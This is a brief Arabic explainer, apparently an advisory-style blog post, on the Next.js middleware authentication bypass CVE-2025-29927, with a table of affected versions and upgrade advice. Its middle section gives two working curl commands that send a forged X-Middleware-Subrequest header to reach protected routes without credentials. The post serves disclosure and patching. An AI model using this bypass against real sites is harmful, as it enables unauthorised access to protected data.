
تخيل حارسًا أمام النادي، لكن إذا قلت له "أنا بالداخل بالفعل"، يسمح لك بالمرور دون فحص. هذا بالضبط ما تمثله CVE-2025-29927.
يعمل الوسيط (Middleware) في Next.js قبل معالجة الطلب، مما يجعله المكان المثالي للتعامل مع المصادقة. تستخدم Next.js ترويسة داخلية باسم x-middleware-subrequest لمنع الطلبات المتكررة وتجنب الحلقات اللانهائية. توضح هذه الثغرة أنه من الممكن تجاوز أو تخطي تنفيذ الوسيطة بالكامل — بما في ذلك فحوصات الأمان الحرجة مثل المصادقة قبل الوصول إلى مسار محمي.
| الفرع | الإصلاح في |
|---|---|
| 15.x | < 15.2.3 |
| 14.x | < 14.2.25 |
| 13.x | < 13.5.9 |
تعمل آلاف أو ملايين التطبيقات على إصدارات Next.js غير مصححة. إذا لم تتم معالجتها، تسمح هذه الثغرة بالوصول غير المصادق إلى المسارات المحمية من قبل أي شخص — دون الحاجة إلى بيانات اعتماد.
curl -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware" \
http://localhost:3000/private-area
يعيد الاستجابة إرجاع الصفحة المحمية دون أي مصادقة.
curl -s "http://<target>/<private-area>" \
-H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware"
قم بترقية Next.js إلى إصدار مصحح:
15.x → 15.2.3 أو أحدث14.x → 14.2.25 أو أحدث13.x → 13.5.9 أو أحدث